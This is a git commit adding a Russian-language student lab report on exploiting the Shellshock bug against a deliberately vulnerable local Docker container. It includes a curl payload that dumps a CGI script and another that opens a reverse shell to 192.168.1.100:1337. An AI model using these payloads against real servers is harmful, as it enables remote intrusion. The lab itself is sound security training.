refactored. 01-02-03 done
This commit is contained in:
53
02-pentest/02-vuln/02-openvas/01-shellshock/README.md
Normal file
53
02-pentest/02-vuln/02-openvas/01-shellshock/README.md
Normal file
@@ -0,0 +1,53 @@
|
||||
# Модуль 2. Сканирование на уязвимости. Сетевые сканирования
|
||||
## Практическое задание №2
|
||||
### Задание №1. Детектирование Shellshock с помощью Nmap
|
||||
|
||||
1. Скачаем [репозиторий](https://github.com/Zenithar/docker-shellshockable) и соберем Docker-контейнер
|
||||
|
||||

|
||||
|
||||
2. Запустим контейнер командой `docker run -d -p 80:80 --name shellshock marker689/shellshockable`
|
||||
|
||||
3. Посмотрим вывод CGI-скрипта.
|
||||
|
||||
```
|
||||
curl http://localhost/cgi-bin/shockme.cgi
|
||||
```
|
||||

|
||||
|
||||
Вывод соответствует коду в CGI-скрипте:
|
||||
|
||||
```bash
|
||||
#!/usr/local/bin/bash
|
||||
echo "Content-type: text/html"
|
||||
echo ""
|
||||
echo "https://shellshocker.net/"
|
||||
```
|
||||
|
||||
4. Выполним эксплуатацию уязвимости Shellshock
|
||||
|
||||
`curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /usr/lib/cgi-bin/shockme.cgi" http://localhost/cgi-bin/shockme.cgi`
|
||||
|
||||

|
||||
|
||||
```bash
|
||||
#!/usr/local/bin/bash
|
||||
echo "Content-type: text/html"
|
||||
echo ""
|
||||
echo "https://shellshocker.net/"
|
||||
```
|
||||
|
||||
Мы раскрыли содержимое скрипта, также можно сделать ревер-шелл.
|
||||
|
||||
5. `curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.100/1337 0>&1'" http://localhost/cgi-bin/shockme.cgi`
|
||||
|
||||

|
||||
|
||||
6. Приступим к написанию
|
||||
|
||||
|
||||
|
||||
# Итог лабораторной работы
|
||||
На этом лабораторная работа окончена, файл отчет в формате pdf во вложении.
|
||||
|
||||
Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.
|
||||
Reference in New Issue
Block a user